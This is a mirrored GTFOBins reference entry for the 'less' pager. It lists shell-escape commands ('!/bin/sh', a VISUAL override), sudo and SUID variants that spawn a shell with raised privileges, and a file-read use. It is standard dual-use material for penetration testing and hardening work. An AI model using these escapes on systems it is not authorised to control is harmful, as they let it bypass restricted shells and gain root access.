mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
22 lines
385 B
Markdown
22 lines
385 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
less /etc/profile
|
|
!/bin/sh
|
|
- code: |
|
|
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
|
v
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo less /etc/profile
|
|
!/bin/sh
|
|
suid-limited:
|
|
- code: |
|
|
./less /etc/profile
|
|
!/bin/sh
|
|
file-read:
|
|
- code: |
|
|
less file_to_read
|
|
---
|